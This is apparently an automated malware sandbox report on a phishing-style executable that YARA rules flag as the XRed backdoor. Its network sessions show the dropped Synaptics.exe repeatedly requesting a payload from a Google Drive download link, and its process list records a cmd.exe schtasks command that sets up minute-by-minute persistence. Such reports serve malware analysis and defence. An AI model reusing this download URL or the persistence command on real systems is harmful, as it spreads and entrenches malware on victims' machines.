                                                                                                                                2024-12-24 17:21:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 67 64 30 45 79 55 49 66 6f 2d 30 33 77 5f 49 6a 44 57 64 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="vgd0EyUIfo-03w_IjDWdCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                82192.168.2.450110142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:48 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-e1-y742f9JDfai9kPuWmUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                83192.168.2.450111142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:48 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bAmiUw9OFzd7_zea-0F6sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                84192.168.2.450119142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7bMQOL0YxAf0kkPrbWS1eD2JOIBEY66VWeJU5R6ZQq8UZqSvjSugrY89VVeJy0fo3bSt_jTno
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6c8jDejuWJtJwaQxV57AQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 61 66 78 78 68 69 6c 4c 2d 63 7a 48 36 36 74 68 6d 4e 73 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="eafxxhilL-czH66thmNsPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                85192.168.2.450120142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5WLpgcBNDUfLrJRL8_akqodRuvQj1STTWbdNnH6J5dVc9Pk-uYLJvNYCegNswaeiMvN7Yc464
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EaBuMDb-tlbLnYyLo76xjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 34 71 59 6f 4f 64 57 6b 71 79 53 46 74 45 6b 78 73 63 61 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="H4qYoOdWkqySFtEkxscarw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                86192.168.2.450117142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yNHKDD1mUwF3uoQCn81c9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                87192.168.2.450118142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-u7kvVlqF7wHt5wHTzZHV-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:12:19:59
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'684'992 bytes
                                                                                                                                MD5 hash:17FB4F9DF5175E684A3427C5997B2007
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:1
                                                                                                                                Start time:12:19:59
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"
                                                                                                                                Imagebase:0xea0000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:20:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:771'584 bytes
                                                                                                                                MD5 hash:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:20:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                Imagebase:0xc40000
                                                                                                                                File size:53'161'064 bytes
                                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:12:20:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
